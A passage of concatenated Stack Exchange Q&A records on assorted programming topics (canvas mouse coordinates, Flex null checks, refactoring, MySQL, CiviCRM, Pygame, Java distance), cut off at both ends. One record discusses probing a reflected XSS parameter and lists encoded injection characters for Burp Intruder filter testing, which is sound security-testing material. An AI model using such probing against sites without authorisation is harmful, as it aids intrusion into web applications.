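If it helps, here is a minimal follow-up sketch (assuming, as above, that <code>Lag<\/code> and <code>ExpSemivariance<\/code> are column vectors of the same length, and that <code>model<\/code>, <code>RMin<\/code> and <code>alphaMin<\/code> come from the <code>fmincon<\/code> snippet) that evaluates the fitted model and plots it against the data as a quick sanity check on the result:\n<code>% quick visual check of the fitted model (illustrative only)\nsemiFit = model(RMin, alphaMin); % model() as defined above\nfigure; hold all;\nplot(Lag, ExpSemivariance, 'o'); % experimental semivariance\nplot(Lag, semiFit, '-'); % fitted curve\nxlabel('Lag');\nylabel('semivariance');\nlegend('data', 'fitted model');\n<\/code>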
It is not completely foolproof, as having good initial values makes it a lot more likely to obtain better values of your <code>R<\/code> and <code>alpha<\/code> in a shorter amount of time. But to learn the in-and-outs, you should really look into the theory of optimization and\/or the documentation of the optimization toolbox. If you are getting poor results, I would recommend to first try changing <code>abs(x)<\/code> to <code>(x).^2<\/code> as that is a lot easier for most optimization algorithms.\n","meta":{"source":"stackoverflow","title":"How to minimize a function without using a loop","dup_signals":{}},"subset":"stackexchange"} +{"text":"Mouse cursor doesn't match with canvas\n\nQuestion: I have question: when I'm drawing a line in canvas, it seems the mouse position doesn't match with the canvas position, so whenever I draw, there is some distance between my cursor and the drawing line .. please help me with this problem, here is my code :\n<code>$(document).ready(function(){\n\n context = document.getElementById('canvasInAPerfectWorld').getContext(\"2d\");\n\n $('#canvasInAPerfectWorld').mousedown(function(e){\n var mouseX = e.pageX - this.offsetLeft;\n var mouseY = e.pageY - this.offsetTop;\n\n paint = true;\n addClick(e.pageX - this.offsetLeft, e.pageY - this.offsetTop);\n redraw();\n });\n\n $('#canvasInAPerfectWorld').mousemove(function(e){ \n if(paint){\n addClick(e.pageX - this.offsetLeft, e.pageY - this.offsetTop, true);\n redraw();\n }\n });\n\n $('#canvasInAPerfectWorld').mouseup(function(e){\n paint = false;\n });\n\n $('#canvasInAPerfectWorld').mouseleave(function(e){\n paint = false;\n }); \n\n});\n\n var clickX = new Array();\n var clickY = new Array();\n var clickDrag = new Array();\n var paint;\n\n function addClick(x, y, dragging)\n {\n clickX.push(x);\n clickY.push(y);\n clickDrag.push(dragging);\n } \n\n function clear_canvas(){\n \/\/alert('masuk claear');\n context.clearRect(0,0,context.canvas.width,context.canvas.height); \n\n }\n\n function redraw(){ \n\n context.strokeStyle = \"#df4b26\";\n context.lineJoin = \"round\";\n context.lineWidth = 5;\n\n for(var i=0; i < clickX.length; i++) { \n context.beginPath();\n if(clickDrag[i] && i){\n context.moveTo(clickX[i-1], clickY[i-1]);\n }else{\n context.moveTo(clickX[i]-1, clickY[i]);\n }\n context.lineTo(clickX[i], clickY[i]);\n context.closePath();\n context.stroke();\n }\n } \n<\/code>\nComment: Would you mind adding a Fiddle or Plunker so we may reproduce your issue accurately and quickly?\nComment: [Can't reproduce](http:\/\/jsfiddle.net\/a92wq06g\/) your issue.\nAnswer: Inside your mouse event handlers, <code>this<\/code> refers to the window object and your <code>this.offsetLeft<\/code> is undefined.\nYou can use <code>getBoundingClientRect<\/code> to get the bounds of your canvas element:\n<code>\/\/ get a reference to your canvas element at the start of your app\nvar canvas=document.getElementById('canvasInAPerfectWorld');\n\n\/\/ example mousedown handler\n\n\/\/ get the current canvas offsets using getBoundingClientRect\nvar BB=canvas.getBoundingClientRect();\nvar offsetX=BB.left;\nvar offsetY=BB.top; \n\n\/\/ calculate the current mouse position relative to the canvas\n\/\/ using e.client and the offsets calculated above\nvar mouseX=parseInt(e.clientX-offsetX);\nvar mouseY=parseInt(e.clientY-offsetY);\n<\/code>\nIf you canvas does not reposition relative to the viewport, you can get the offsets once at the start of your app so they don't need to be recalculated every time inside the mouse 
handler.\nComment: This worked for me -- with this one modification. I set the \"canvas\" to be the event target object, like so:\n\nvar canvas=e.target;\nAnswer: You could follow the solution in markE's answer (also found here).\nOr you could do the following if your layout allows\n\nSet canvas element to position relative\nUse <code>layerX<\/code> and <code>layerY<\/code> to read the mouse position\n\nThis approach gives a little simpler code.\nBoth methods will be affected by padding and border thickness (they need to be subtracted if any is used). If you want border\/padding it's better to wrap the canvas in a div and then style the div instead.\nExample using relative positioned canvas\n\n<code>var c = document.querySelector(\"canvas\"),\n ctx = c.getContext(\"2d\");\n\nctx.font = \"bold 16px sans-serif\";\n\nc.onmousemove = function(e) {\n \n var x = e.layerX,\n y = e.layerY;\n\n ctx.clearRect(0, 0, 300, 20);\n ctx.fillText(\"x: \" + x + \", y: \" + y, 10, 16);\n};<\/code>\n<code>div {padding:20px}\ncanvas {background:#eee; position:relative}<\/code>\n<code><div><div><canvas><\/canvas><\/div><\/div><\/code>\n\nExample using getBoundingClientRect()\n\n<code>var c = document.querySelector(\"canvas\"),\n ctx = c.getContext(\"2d\");\n\nctx.font = \"bold 16px sans-serif\";\n\nc.onmousemove = function(e) {\n \n var rect = this.getBoundingClientRect(),\n x = e.clientX - rect.left,\n y = e.clientY - rect.top;\n\n ctx.clearRect(0, 0, 300, 20);\n ctx.fillText(\"x: \" + x + \", y: \" + y, 10, 16);\n};<\/code>\n<code>div {padding:20px}\ncanvas {background:#eee; position:relative}<\/code>\n<code><div><div><canvas><\/canvas><\/div><\/div><\/code>\n","meta":{"source":"stackoverflow","title":"Mouse cursor doesn't match with canvas","dup_signals":{}},"subset":"stackexchange"} +{"text":"Reflected XSS - Automatic understanding of filters\n\nQuestion: I'm currently facing this possible reflected XSS vulnerability on a webapp:\nURL = <code>http:\/\/www.test.com\/login\/?login=[PAYLOAD]<\/code>\nWhen a user clicks on this link, it displays a login page that includes the following code:\n<code><a href=\"http:\/\/www.test.com\/login\/[PAYLOAD]><img...><\/img><\/a>\n<\/code>\nI tried to close the <code><a><\/code> tag using <code>><\/code> with different encodings, but this is filtered and displayed as <code>%3E<\/code>. I also tried to close the double quote and use some things like onclick etc. but this is filtered as well. \nSo I was wondering, is there any tool out there that can automatically test all characters in a given set with different encodings to see what is filtered ?\nI could create my own script to do that, but it might save some time and well... reinventing the wheel..\nUpdate:\nSo it appears that there is no tool that provide such capability. ie: test and report for every input what is filtered (and how it renders) or what is not. Burp ends up being the best solution to do that semi-manually, and a Burp extension can be done to fully automate this process. \nComment: Very nice and well presented a question. A well-deserved +1 from me.\nAnswer: You could probably use Burp Suite to do this. Burp Proxy will let you intercept an HTTP request to a specific URL, <code>http:\/\/www.test.com\/login\/?login=[PAYLOAD]<\/code> for example. \nOnce you have intercepted this request you can specify which of the parameters you would like to target using Burp Intruder(in this case <code>login<\/code>). \nNext you can specify a payload that you would like to apply to this parameter. 
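As a purely illustrative example (not one of Burp's built-in lists), a small custom payload set for checking which encodings of the same characters survive the filter might look like this, one entry per line:\n<code>>\n%3e\n%253e\n&gt;\n\"\n%22\n'\n%27\n<\n%3c\n<\/code>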
You can choose from a number of existing payloads or you can create your own.\nWhen you begin the attack it will fire a request with every item in your payload set and give you a number of options for examining the result, such as grepping for the payload to see if it made it through intact.\nHope this helps!\nComment: Right on, let me know how it turns out! The grep functionality may work for your needs. Basically you would grep the response to see if the un-encoded character is in there. So if you submit `>` in the payload you would grep for `<a href=\"http:\/\/www.test.com\/login\/>`. If it is encoded the response will contain `<a href=\"http:\/\/www.test.com\/login\/%3E` instead, so it will say there is no match. Let me know if that is confusing.\nComment: Reason for downvote?\nComment: I was wondering as well ? I'll try with Burp Intruder tomorrow, i'm unsure the grep part can be automated as I'd like. I want to see if I can still escape the tag for this particular case, but basically what I would like also is a list, for each input, of what's filtered \/ what's not.\nComment: So I did this with Burp Intruder for this particular test and it worked fine, but after looking everywhere it appears there's no software\/plugin to do this automatically on every input you want. Thank you anyway I'll mark this as the right answer.\nComment: Hrrm, you should be able to specify your own input file. I use the pay version so maybe that is a paid feature?\nComment: I wasn't clear, there's no problem with Burp, I am able to specify my own input file. What I meant is there's no \"point & click\" software to do this with a neat report showing the \"filtering level\" for every input of a webpage\/site (as that was my original question).\n","meta":{"source":"security.stackexchange","title":"Reflected XSS - Automatic understanding of filters","dup_signals":{}},"subset":"stackexchange"} +{"text":"Flex: How can I catch something before I get the error \"Cannot access a property or method of a null object reference\"\n\nQuestion: So, I have a dataprovider that, when the module isn't be used, is set to an empty arrayCollection. Then, when the module is ready to be used, the dataprovider is changed to an array collection full of data. For some reason, another one of my functions is having problems with this. I keep getting the following error:\n\nCannot access a property or method of a null object reference\n\nThe following is the line of code causing the error:\n<code>for (i = 0; i < pickupPhoto.length; i++)\n<\/code>\nIs there any way I can make sure that pickupPhoto has a length property before calling this for loop? I tried the following, but I got the same error:\n<code>if (pickupPhoto.hasOwnProperty(\"length\"))\n<\/code>\nAlso tried:\n<code>if (pickupPhoto.length)\n<\/code>\nThanks in advance,\nBrds\nComment: It's worth noting that the length property isn't what is null here. The only way a null pointer can happen is if pickupPhoto is null.\nAnswer: <code>if (pickupPhoto) {\n for (i = 0; i < pickupPhoto.length; i++) {\n \/* ... *\/\n }\n}\n<\/code>\nAlso, prefer storing the length in a variable instead of calling the <code>length<\/code> getter for every iteration:\n<code>var len:int = pickupPhoto.length;\nfor (i = 0; i < len; i++) {\n \/* ... *\/\n}\n<\/code>\nAnswer: Your problem is not that \"length\" doesn't exist, but that pickupPhoto is actually null. 
But, you can check for both:\n<code>if (pickupPhoto && \"length\" in pickupPhoto) {\n \/\/ do something with pickupPhoto.length\n}\n<\/code>\nComment: Right. Because `pickupPhoto` is null.\n","meta":{"source":"stackoverflow","title":"Flex: How can I catch something before I get the error \"Cannot access a property or method of a null object reference\"","dup_signals":{}},"subset":"stackexchange"} +{"text":"expand dropdown on focus jquery\n\nQuestion: I am expanding the dropdown on focus which is same as clicking on the dropdown and selecting an option. \n<code> <script type=\"text\/javascript\">\n $(document).ready(function () {\n $('#<%= ddlNature.ClientID %>').focus(function () {\n $('#<%= ddlNature.ClientID %>').attr('size', 6);\n });\n $('#<%= ddlNature.ClientID %>').focusout(function () {\n $('#<%= ddlNature.ClientID %>').attr('size', 1);\n });\n\n });\n<\/script>\n\n<asp:DropDownList ID=\"ddlNature\" runat=\"server\" class=\"text\" TabIndex=\"5\">\n<\/code>\n\nThe dropdown expands on focus but the option selected from the dropdown does not get selected ie. the expanded dropdown does not function as dropdown. I am not getting the value selected when i inspect in the firebug.\nWhen I set AutoPostBack to true of the dropdownlist, I get the dropdown value but I don't want to refresh the page. \nThanks,\nComment: Why dont you use height() & width() functions\nAnswer: The code is just fine..\nFirebug does not display the select changes..\nIf you attach a change handler you will see that it does change it indeed..\nSee demo http:\/\/jsfiddle.net\/gaby\/vxDrE\/\nComment: just saw it looks great..but when we select value, Should not it close the dropdown like size = 1?\nComment: @Kamron, no because you told it that this size is 6.. you only revert it back to normal behavior when you tell it to set size to 1. but that happens on `focusout` (*when you click outside of the select box*)\nComment: @Gaby No the value is not selected because I am changing the value of another dropdown based on the value of the first dropdown.\nComment: I didnt post the question though. but i was curious if we select the data and dropdown should be back to normal, what changes should be done to code.\nComment: can someone pls help me with this it is very urgent pls\nComment: @asifa, is a postback happening when you select an option ? it might be causing the page to reload and perhaps reset the form (*based on what you do server-side*)\nComment: @Gaby when i set to autopostback the value is selected but the page refreshes i want to stop the page from refreshing without affecting the selected value. I tried e.preventDefault() but to no avail\nComment: @asifa, but the change in the other dropdown does it happen server-side ? or client-side ?\nComment: client-side. The value of the dropdown gets selected only when i set the autopostback to true but i don't want the page to refresh\nComment: @asifa, for debugging, did you add a `.change()` handler with jquery to confirm that the change does not happen (*client-side*)?\n","meta":{"source":"stackoverflow","title":"expand dropdown on focus jquery","dup_signals":{}},"subset":"stackexchange"} +{"text":"Explaining refactoring\n\nQuestion: Question\nMy question is how can you teach the methods and importance of tidying-up and refactoring code?\nBackground\nI was recently working on a code review for a colleague. They had made some modifications to a long-gone colleagues work. 
During the new changes, my colleague had tried to refactor items but gave up as soon as they hit a crash or some other problem (rather than chasing the rabbit down the hole to find the root of the issue) and so reimplemented the problem code and built more on top of that. This left the code in a tangle of workarounds and magic numbers, so I sat down with them to go through refactoring it.\nI tried to explain how I was identifying the places we could refactor and how each refactoring can often highlight new areas. For example, there were two variables that stored the same information - why? I guessed it was a workaround for a bigger issue so I took out one variable and chased the rabbit down the hole, discovering other problems as we went. This eventually led to finding a problem where we were looping over the same things several times. This was due in no small part to the use of arrays of magic number sizes that obfuscated what was being done - fixing the initial \"double-variable\" problem led to this discovery (and others).\nAs I went on this refactoring journey with my colleague, it was evident that she wasn't always able to grasp why we made certain changes and how we could be sure the new functionality matched the original, so I took the time to explain and prove each change by comparing with earlier versions and stepping through the changes on paper. I also explained, through examples, how to tell if a refactoring choice was a bad idea, when to choose comments instead of code changes, and how to select good variable names.\nI felt that the process of sitting together to do this was worthwhile for both myself (I got to learn a bit more about how best to explain things to others) and my colleague (they got to understand more of our code and our coding practices) but, the experience led me to wonder if there was a better way to teach the refactoring process.\n...and finally...\nI understand that what does or does not need refactoring, and how to refactor it are very subjective so I want to steer clear of that discussion, but I am interested to learn how others would tackle the challenge of teaching this important skill, and if others here have had similar experiences and what they learned from them (either as the teacher or the student).\nComment: This question appears to be off-topic because it is not within the bounds of discussion as described in the help center.\nAnswer: Like most programming, refactoring skill comes with practice and experience. It would be nice to think it can be taught, but it has to be learned - and there is a significant difference in the amount of learning that can be accomplished in different environments.\nTo answer your question, you can teach refactoring methods and good design in a pedagogical fashion, and that's fine. But, ultimately, you and I both know attaining a certain level is only through long hard experience.\nComment: So true. Experience is certainly a factor. 
A colleague of mine also believes there's an element of talent involved and that some are \"born to refactor\".\nAnswer: I am not 100% to understand your question but I think you can refer yourself to Code Smell that need to be refactored.It contain a lot of example that you could show to other.\nHere is a list of when refactoring should be used (list of code smell)\nComment: This is certainly useful, but I'm not convinced it's the best way of teaching someone the concepts and skills required when refactoring.\nComment: At my University (Canada) it was the way they show us why refactoring is important and how to develop ability with by comparing to those smells.\nComment: Yes. It's an important part of learning refactoring (hence the up vote).\nAnswer: If you haven't read it, Martin Fowler has an excellent book on the subject called Refactoring: Improving the Design of Existing Code. He goes into substantial detail about how and why a specific piece of code should be refactored.\nI hesitated to even mention it for fear that knowledge of this book is assumed by someone asking about refactoring, and that you would think, \"Duh, I meant besides the Fowler book.\" But what the hey, there you go. :-)\nComment: Thanks, I know about the book. Like I said, I don't want to discuss what should be refactored and why, I want to discuss how you teach someone that. The book certainly helps, but I think there are other methods.\nAnswer: You don't mention tests. To 'prove' that a refactoring does not break the existing functionality you need to either have existing tests or write tests before doing the refactoring.\nComment: Yes, I understand that testing is important when refactoring, but I want to teach someone the importance of refactoring and how to do it. While tests are an element of refactoring, they aren't necessarily how you teach it.\nAnswer: Pair Programming seems to be the best way for me to get this across. This way, as we're working on real, production code, and we both encounter some code that doesn't smell right, we tackle a code refactoring together. The pair acts as the driver's conscience saying to do the right thing instead of the quick fix, and in turn, they both learn what good code looks like in the process.\nRefactoring can be an art, and just takes practice. The more you do it, the better you get at it. Keep studying the methods described in Martin Fowler's Ractoring book, and use your tools (Resharper for Visual Studio folk)\nComment: This approach was certainly helpful last night. I don't think the project lead will authorise it as an ongoing approach to our work but I'm inclined to use it again in similar circumstances.\nAnswer: One simple way to conceive of refactoring is right there in the name -- it's just like when you factor a common variable out of an equation:\n<code>xy + xz\n<\/code>\nbecomes\n<code>x(y + z)\n<\/code>\nThe x has been factored out. Refactoring code is the same thing, in that you're finding duplicate code or logic and factoring it out.\nComment: I would edit this answer so that it used `\u2022`.\nComment: Thanks. That's a great way of explaining what refactoring is doing, but it doesn't go so far as to teach the actions of refactoring and the practices therein.\nAnswer: It sounds like your approach is a very good one. At the end of the process, you showed how you were able to uncover and fix a lot of problems. For educational purposes, it could then be interesting to invent a new change\/enhancement\/fix. 
You could then ask your mentoree how they would enact that change with the old a new codebase. Hopefully they'll see that it's much easier to make the new change with the refactored code (or how doing more refactoring would be the easiest way to prepare for the hypothetical change).\nAnswer: I see a couple of different ways you could try to teach refactoring:\nGiven textbook-like examples. A downside here is that you may have contrived or simplistic examples where why refactoring is useful doesn't necessarily shine through as well as in other cases.\nRefactoring existing code. In this case you could take existing legacy code that you'd clean up, or your own code in development and show the before and after doing various bits to see how much better the after is, in terms of readability and ease of maintanence. This may be a better exercise to do as this is live code being improved and enhanced to some extent.\nIt isn't something that someone can pick up instantly, it takes time, practice, effort and patience as some refactorings may be done for personal preference rather than because the code runs optimally one way or another.\nAnswer: Teaching someone to refactor when they aren't a natural is a tough job. In my experience your best bet is to sit down with them in an office and refactor some code. While you are doing this keep up a \"stream of consciousness\" dialog. Talk about what you see, why the code doesn't smell right, options to refactor to, etc. Also you should make sure they're doing the same thing. The most important thing is to impart why, not how, to change the code. Any decent programmer can make a change and have it work, but it takes skill and experience to be able to state why the new solution is better than the previous.\n","meta":{"source":"stackoverflow","title":"Explaining refactoring","dup_signals":{}},"subset":"stackexchange"} +{"text":"Rake trouble finding MySQL after uninstalling Rails 3.0.0\n\nQuestion: So I thought I had fixed the problem posted in this question and I uninstalled Rails 3.0.0 with <code>sudo gem uninstall rails -v 3.0.0<\/code>, but then I had troubles with other things. I took rogerdpack's advice to a different level and uninstalled all of my ruby gems and mysql, then reinstalled them. Now I get the following:\n<code>Icarus:temporary atg$ rails shopping -d mysql\n create ........\nIcarus:temporary atg$ cd shopping\/\nIcarus:shopping atg$ rake db:create\n(in \/Users\/atg\/temporary\/shopping)\nCouldn't create database for {\"reconnect\"=>false, \"encoding\"=>\"utf8\", \"username\"=>\"root\", \"adapter\"=>\"mysql\", \"database\"=>\"shopping_development\", \"pool\"=>5, \"password\"=>nil, \"socket\"=>\"\/tmp\/mysql.sock\"}, charset: utf8, collation: utf8_unicode_ci (if you set the charset manually, make sure you have a matching collation)\n<\/code>\nWhat does this mean and how can I fix it?\nAll help is appreciated and thanks in advance!\nComment: maybe reinstall rails?\nComment: So run `sudo gem uninstall rails; sudo gem install rails -v 2.3.8` is your suggestion?\nAnswer: I restarted after the install and everything worked again. 
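For anyone following along, the sequence described above and in the comments looks roughly like this; treat it as a sketch rather than an exact transcript, since the gem names and versions depend on your setup:\n<code>sudo gem uninstall rails # repeat for the other installed gems\nsudo gem uninstall mysql\n# reinstall MySQL itself, then the gems\nsudo gem install mysql\nsudo gem install rails -v 2.3.8\n# finally, restart the machine\n<\/code>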
So the key fix was to uninstall and reinstall everything, and then to restart so that changes can take effect.\n","meta":{"source":"stackoverflow","title":"Rake trouble finding MySQL after uninstalling Rails 3.0.0","dup_signals":{}},"subset":"stackexchange"} +{"text":"kill sleeping process in mysql?\n\nQuestion: I have a MySQL database, which is very often filling with sleep process and I have to open my workbench and then have to kill them to free connections & then it will work fine. \nIs there any way I can do that from command line?\nComment: A detailed blog :http:\/\/sforsuresh.in\/how-to-delete-sleeping-processes-in-mysql\/\nAnswer: To list all sleeping process in your database\n<code>sudo \/mysql_rms\/bin\/mysqladmin -S \/mysql_rms\/var\/mysql_rms.sock -p processlist \n<\/code>\nHere you will get list of data , among that list the first field is pid.\nTo Kill all of them\n<code>sudo \/mysql_rms\/bin\/mysqladmin -S \/mysql_rms\/var\/mysql_rms.sock -p kill <id1>,<id2>\n<\/code>\nId's are nothing but pid which was taken above. You can kill one after one or you can kill all of them at a time by appending them one after one by separating with comma (,).\n","meta":{"source":"askubuntu","title":"kill sleeping process in mysql?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Allowing group management to users with limited permissions\n\nQuestion: This may be a shortcoming or bug to-do with access control, but maybe I'm missing something.\nI've setup Drupal permissions and ACLs and they are working 100% except for one thing: users can only view the groups for which they explicitly have an ACL for. In other words, only users with CMS permission to \"View all contacts\" can view groups they themselves created.\nAm I correct in assuming that this is a shortcoming, or is it a bug? Either way, what are y'alls suggestions for allowing users be able to create, edit and manage their own groups without giving them \"View all contacts\"? Is there a way to do it using hook_civicrm_aclWhereClause?\nAnswer: Yes, this is a shortcoming in the current acl system.\nOne possible workaround for this might be to implement the post hook on the civicrm_group object. The post hook can take the contactID of the person creating the group and add an ACL giving this person access to the group.\nYou can implement the above hook in an extension. Probably worth considering including this in core need on a setting\nComment: Thank Donald. I looked at the group object and none of the fields appeared to offer any permissions control more than what was on the create group form, so I think this is a dead end.\nComment: You will need to use the post hook to create the relevant ACLs for that group. The group object does not have any permissioning fields.\nComment: Ohhhhh, I see what you are saying: create a new ACL for every new group. The downside is the the # of ACLs could go up quickly it there are a lot of groups, but good idea!\nAnswer: I a temporary workaround until I have time to fix permissions. 
It hooks the create group form and prevents users from creating groups whom don't have permission to \"edit all contacts\".\n<code>function memberperms_civicrm_buildForm( $formName, &$form ) {\n if (strpos($formName, \"AddToGroup\")\n and\n !CRM_Core_Permission::check('edit all contacts')\n ) {\n\n \/\/ Display Error Message\n CRM_Core_Session::setStatus(\"Sorry, the group feature is not currently supported for members\", \"Permission Denied\", \"error\");\n\n \/\/ Redirect to civicrm home\n drupal_goto(\"civicrm\"); \n }\n}\n<\/code>\nComment: Hey @bdombro. Any update on this? How did you manage to solve it eventually? Do you know if there is any relevant functionality incorporated in newer CiviCRM versions? Thnx for you time!\nAnswer: This is old, but just in case anyone finds it, I think my Auto Group Extension solves this problem.\n\nCiviCRM AutoGroup extension\nThis extension allows you to choose a set of groups which will be\nadded to new contacts if the logged in contact is also in that group.\ne.g. If Staff member Wilma is in the group 'Region: Birmingham' and\nWilma adds a new contact, it can automatically add the new contact\ninto 'Region: Birmingham' group.\nWhy this was created\nIf you are using Access Control Lists (ACLs) to restrict access based\non groups, e.g. a client of ours has a regional model whereby staff in\ndifferent regions only access contacts for that region, then it's\nannoyingly easy to add a contact and immediately lose access to it\nbecause you forgot to add them into your regional group.\n","meta":{"source":"civicrm.stackexchange","title":"Allowing group management to users with limited permissions","dup_signals":{}},"subset":"stackexchange"} +{"text":"Distance in KM error?\n\nQuestion: This class stores information about a location on Earth. Locations are\nspecified using latitude and longitude. 
The class includes a method for\ncomputing the distance between two locations in kilometers.\n`* This implementation is based off of the example from Stuart Reges at \n the University of Washington.\n<code>public class GeoLocation \n{\n \/\/ Earth radius in miles\npublic static final double RADIUS = 3963.1676; \n\n\/\/ Number of kilomteres in one mile\npublic static final double KM_PER_MILE = 1.60934;\n\nprivate double latitude;\nprivate double longitude;\n\n\/**\n * Constructs a geo location object with given latitude and longitude\n *\/\npublic GeoLocation(double theLatitude, double theLongitude) \n{\n latitude = theLatitude;\n longitude = theLongitude;\n}\n\n\/**\n * Returns the latitude of this geo location\n *\/\npublic double getLatitude() \n{\n return latitude;\n}\n\n\/**\n * returns the longitude of this geo location\n *\/\npublic double getLongitude() \n{\n return longitude;\n}\n\n\/\/ returns a string representation of this geo location\npublic String toString() \n{\n return \"latitude: \" + latitude + \", longitude: \" + longitude;\n}\n\npublic double distanceFromInKilometers(GeoLocation other)\n{\n double lat1 = Math.toRadians(latitude);\n double long1 = Math.toRadians(longitude);\n double lat2 = Math.toRadians(other.latitude);\n double long2 = Math.toRadians(other.longitude);\n \/\/ apply the spherical law of cosines with a triangle composed of the\n \/\/ two locations and the north pole\n double theCos = Math.sin(lat1) * Math.sin(lat2) +\n Math.cos(lat1) * Math.cos(lat2) * Math.cos(long1 - long2);\n double arcLength = Math.acos(theCos);\n\n return KM_PER_MILE * arcLength * RADIUS;\n}'\n<\/code>\nSo I have this code that is meant to convert to kilometers and:\nSan Francisco to New York City converts currently to 4133.143717886466 which is correct, however International Flight's conversion is 5576.443040444087 when it should be 5576.443040444088, any specific reason this number is off by 1 when the other one works?\nComment: Possible duplicate of [How to resolve a Java Rounding Double issue](http:\/\/stackoverflow.com\/questions\/179427\/how-to-resolve-a-java-rounding-double-issue)\nComment: I have tried adding rounding to it using math.round() and it made it 5576.0\nComment: It has to do with precision. Do you really need to be so precise up to 0.000000000001 kilometer?\nAnswer: I figured it out, for whatever reason Java doesn't do its calculations properly and I found a solution.\n<code>public double distanceFromInKilometers(GeoLocation other)\n{\n double lat1 = Math.toRadians(latitude);\n double long1 = Math.toRadians(longitude);\n double lat2 = Math.toRadians(other.latitude);\n double long2 = Math.toRadians(other.longitude);\n \/\/ apply the spherical law of cosines with a triangle composed of the\n \/\/ two locations and the north pole\n double theCos = Math.sin(lat1) * Math.sin(lat2) +\n Math.cos(lat1) * Math.cos(lat2) * Math.cos(long1 - long2);\n double arcLength = Math.acos(theCos);\n double miles = arcLength * RADIUS\n return KM_PER_MILE * miles;\n}'\n<\/code>\n","meta":{"source":"stackoverflow","title":"Distance in KM error?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Rectangle doesn't draw\n\nQuestion: I'm currently coding a game for university and I need a sidepanel for that. So I wanted to draw a rectangle on the side. Below you can see my code. 
We should just use PyGame for everything.\n<code>def drawRect():\n rect2 = pygame.Rect(SCREEN_WIDTH - PANEL_SIZE, SCREEN_HEIGHT, PANEL_SIZE, SCREEN_HEIGHT)\n pygame.draw.rect(screen, BLACK, rect2)\n<\/code>\nThe rectangle doesnt pop up on my screen and I just cant figure out why.\nComment: Please make sure the indentation of your code in your question is _identical_ to what is in your actual code, because python is sensitive to indentation errors. I prefer to use [code blocks](\/help\/formatting) with three backticks ( ` ) for this. Since you're new here, please also take the [tour], read [what's on-topic here](\/help\/on-topic), [ask], \nand the [question checklist](\/\/meta.stackoverflow.com\/q\/260648\/843953), \nand provide a [mre]. Welcome to Stack Overflow!\nAnswer: In the Pygame coordinate system, the top left is (0, 0). Hence, the rectangle at the bottom is off the screen. Change the position of the rectangle:\n<code>rect2 = pygame.Rect(SCREEN_WIDTH - PANEL_SIZE, SCREEN_HEIGHT, PANEL_SIZE, SCREEN_HEIGHT)<\/code>\n<code>rect2 = pygame.Rect(SCREEN_WIDTH - PANEL_SIZE, 0, PANEL_SIZE, SCREEN_HEIGHT)\n<\/code>\n","meta":{"source":"stackoverflow","title":"Rectangle doesn't draw","dup_signals":{}},"subset":"stackexchange"} +{"text":"Plot a flat function (2)\n\nQuestion: (In fact I realize threre are two questiona inside this one)\nThis is an uncredible sequel of the question Plot an apparently flat function.\nAfter a lot of effort and suggestion\n<code> Plot[Evaluate[E^(x^2 + 7*x - 30)\/Exp[-30]], {x, -4, -3}, \n PlotRange -> {0, 0.0000005}, \n AxesLabel -> {\"x\", \n \"(\\!\\(\\*SubscriptBox[\\(f\\), \\(4\\)]\\)[x]-1)\/Exp[-30]]\"}]\n<\/code>\nThis gives nothing - there is truly a minimum in the function - and this \n<code>Plot[Evaluate[E^(x^2 + 7*x - 30)\/Exp[-30]], {x, -4, -3}, \n PlotRange -> {, 0.0000005}, \n AxesLabel -> {\"x\", \n \"(\\!\\(\\*SubscriptBox[\\(f\\), \\(4\\)]\\)[x]-1)\/Exp[-30]]\"}]\n<\/code>\nworks perfectly even if MA complains.\nSo now how insert this local comportment as a zooming inside a large figure ?\nAnswer: No need for manual setting of the range:\n<code>Plot[Evaluate[E^(x^2 + 7*x - 30)\/Exp[-30]], {x, -4, -3}, \n PlotRange -> {All, Full}, Frame -> True, \n FrameLabel -> {\"x\", \n \"(\\!\\(\\*SubscriptBox[\\(f\\), \\(4\\)]\\)[x]-1)\/Exp[-30]]\"}]\n<\/code>\nAnswer: You should give PlotRange in its full form:\n<code>Plot[Evaluate[E^(x^2+7*x-30)\/Exp[-30]],{x,-4,-3},PlotRange->{{-4,-3},{4.5*10^-6,6.5*10^-6}},AxesLabel->{\"x\",\"(\\!\\(\\*SubscriptBox[\\(f\\), \\(4\\)]\\)[x]-1)\/Exp[-30]]\"}]\n<\/code>\n","meta":{"source":"mathematica.stackexchange","title":"Plot a flat function (2)","dup_signals":{}},"subset":"stackexchange"} +{"text":"Why is it called the \"Ottoman\" Empire in English language?\n\nQuestion: I don't get why in English language it is called the \"Ottoman\" Empire.\nThe name of the state derives from its founder, Osman I., however how can \"Osman\" be transformed to \"Ottoman\"? For me this doesn't make any sense.\nIn my mother tongue, which is German, it is called \"Osmanisches Reich\", hence \"Osmanic Empire\" appears to me as a more logical English version in my opinion.\nhttps:\/\/de.wikipedia.org\/wiki\/Osmanisches_Reich\nComment: ...Point being, the guy's name was **not** \"Osman\" either. That's just somebody's transliteration into the Latin alphabet of *one* of the versions of the guy's name from Arabic. Arabic is a **different** language, with different sounds than either Turkish, German, or English. 
This is also why there are something like 12 different spellings floating around for the name \"Quadaffi\".\nComment: Because the pronunciation differs as user244 already answered, Just to provide more info, Arabs pronounce it Uthman. The Turks, Pakistanis, Indians and Iranians (I Think?) Pronounce it as Osman. It was called Osmanli Devleti (Osmani State) or Devlete Ebedi (Eternal State) by the Turks and to others who pronounced the name like them it was known as Khilafah-e-Osmaniye or Sultanate-e-Osmaniye. The English name derives from the Arabic Pronunciation Uthman obviously (Uthman-Otman-Ottoman something like that I reckon)\nComment: \"s\" and \"t\" are actually quite prone to change places with each other, just as \"r\" and \"l\", or \"m\", and \"n\". They might not seem that similar to you but they occur in the same part of the mouth. The change is more often (but not exclusively) from \"t\" or \"th\" sounds to \"ts\" or \"s\" or \"sh\" sounds. Ever notice all those \"-tion\" words in English that are written with a \"t\", were pronounced in Latin with a \"t\", but pronounced in English with a \"sh\"?\nComment: @BruderLustig that's a different thing. Ancient Latin didn't have J, only I; J was a later development, at which point initial I's started \"turning into\" J's. Likewise Latin only had one letter for U\/V\/W (written like V, but sounds like U or W) and the other forms came later. In medieval English you can find an intermediate where they were still considered different forms of one letter, but people wrote the \"u\" form in the middle of words, so you would get things like \"loue\" and \"heauen\".\nComment: @hobbs Are the letters 'v'&'u' and 'i'&'j' also belonging to this sort of similiar letters? Just think on the INRI plaque on the christian cross, in which 'jesus' is obviously written as 'iesus' (I used lowercase letters for better distinction). The name of my hometown in Austria starts with an 'U', in very old documents however the name is written with a 'V' instead with an 'U'.\nComment: You do realise that _in the German Wikipage you posted the link for_ it says: `\"Die [...] Bezeichnung Ottomanisches Reich leitet sich von Varianten der arabischen Namensform Uthman 